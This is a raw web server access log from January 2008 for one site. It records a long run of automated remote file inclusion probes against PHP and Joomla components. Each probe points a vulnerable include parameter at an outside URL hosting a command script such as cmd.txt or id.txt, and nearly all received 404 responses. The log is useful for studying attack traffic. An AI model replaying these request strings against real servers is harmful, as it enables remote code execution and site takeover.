200.73.13.24 - - [26/Jan/2008:07:37:51 -0800] "GET /logs//get_reminders.php?includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:07:38:58 -0800] "GET /logs/access_071229.log/content.php?seite=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:07:38:59 -0800] "GET /logs/content.php?seite=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:07:39:18 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:07:39:20 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:07:39:22 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:07:39:53 -0800] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:07:40:23 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:07:40:23 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:07:40:24 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.21 - - [26/Jan/2008:07:40:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.119.181 - - [26/Jan/2008:07:40:39 -0800] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.119.181 - - [26/Jan/2008:07:40:39 -0800] "GET //popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.119.181 - - [26/Jan/2008:07:40:40 -0800] "GET /logs//popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:07:41:40 -0800] "GET //popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:07:43:05 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:07:43:41 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:07:44:52 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.44.68 - - [26/Jan/2008:07:45:29 -0800] "GET //popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:07:46:20 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:07:46:24 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:07:47:28 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:07:47:28 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:07:47:29 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.142.34.18 - - [26/Jan/2008:07:47:30 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
121.142.34.18 - - [26/Jan/2008:07:47:30 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:07:47:41 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.119.181 - - [26/Jan/2008:07:49:37 -0800] "GET //popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:07:51:34 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:07:51:35 -0800] "GET //modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:07:51:59 -0800] "GET //ws/login.php?noSet=0&includedir=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:07:51:59 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:07:52:28 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:07:52:45 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:07:52:45 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:07:52:45 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:53:43 -0800] "GET /logs/access.log//header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:53:44 -0800] "GET //header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:53:44 -0800] "GET /logs//header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:54:18 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:54:18 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:54:19 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:54:37 -0800] "GET /logs/access_071220.log//header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:07:55:13 -0800] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:07:55:14 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:07:55:15 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:07:56:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.33 - - [26/Jan/2008:07:57:27 -0800] "GET /tmp/?M=A HTTP/1.0" 200 981 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.134.252.26 - - [26/Jan/2008:07:58:39 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.usipime.com/adpics/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
205.134.252.26 - - [26/Jan/2008:07:58:42 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.usipime.com/adpics/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:08:01:14 -0800] "GET /logs/access_080104.log//get_reminders.php?includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.22.27 - - [26/Jan/2008:08:01:23 -0800] "GET //popup_window.php?site_isp_root=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:08:01:24 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:08:04:04 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:08:04:04 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:08:04:45 -0800] "GET /errors.php?error=http://berlinbalboa.de//images/img/contr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:08:04:45 -0800] "GET /logs/errors.php?error=http://berlinbalboa.de//images/img/contr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.223.113.2 - - [26/Jan/2008:08:05:01 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.252.149.15 - - [26/Jan/2008:08:06:33 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.252.149.15 - - [26/Jan/2008:08:06:37 -0800] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:08:06:50 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:07:17 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:07:17 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:07:17 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:08:08:08 -0800] "GET /logs/access_071130.log//aedatingCMS.php?dir[inc]=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:08:08:10 -0800] "GET //aedatingCMS.php?dir[inc]=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:08:08:12 -0800] "GET /logs//aedatingCMS.php?dir[inc]=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:08:18 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:08:09:30 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:08:09:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:08:09:43 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.32 - - [26/Jan/2008:08:11:01 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:08:12:55 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:08:13:42 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:08:13:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:08:13:43 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:08:15:51 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:08:15:51 -0800] "GET //modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:08:16:02 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:08:16:04 -0800] "GET /plans/?M=D HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:08:16:04 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:08:16:26 -0800] "GET //admin/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:08:16:26 -0800] "GET /logs//admin/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:08:16:45 -0800] "GET /logs/access_071219.log//admin/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:08:16:51 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:08:17:08 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:08:17:08 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:08:17:09 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.21 - - [26/Jan/2008:08:17:24 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.21 - - [26/Jan/2008:08:17:25 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:08:18:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:08:18:45 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://puerco.altervista.org/new/bx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:08:18:45 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://puerco.altervista.org/new/bx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:08:18:46 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:08:18:46 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
62.68.217.6 - - [26/Jan/2008:08:19:41 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:08:20:30 -0800] "GET /index.php?body=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:08:20:30 -0800] "GET /logs/index.php?body=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:08:22:32 -0800] "GET /logs/access_071216.log//aedatingCMS.php?dir[inc]=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:08:22:45 -0800] "GET /default.php?t=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:08:22:45 -0800] "GET /logs/default.php?t=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
67.195.44.91 - - [26/Jan/2008:08:24:44 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.34.10 - - [26/Jan/2008:08:26:43 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.34.10 - - [26/Jan/2008:08:26:44 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.34.10 - - [26/Jan/2008:08:26:44 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:08:27:55 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:08:27:55 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:08:27:55 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:08:28:07 -0800] "GET /logs/access_071225.log//index.php?pag=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:08:28:08 -0800] "GET //index.php?pag=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:08:28:08 -0800] "GET /logs//index.php?pag=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
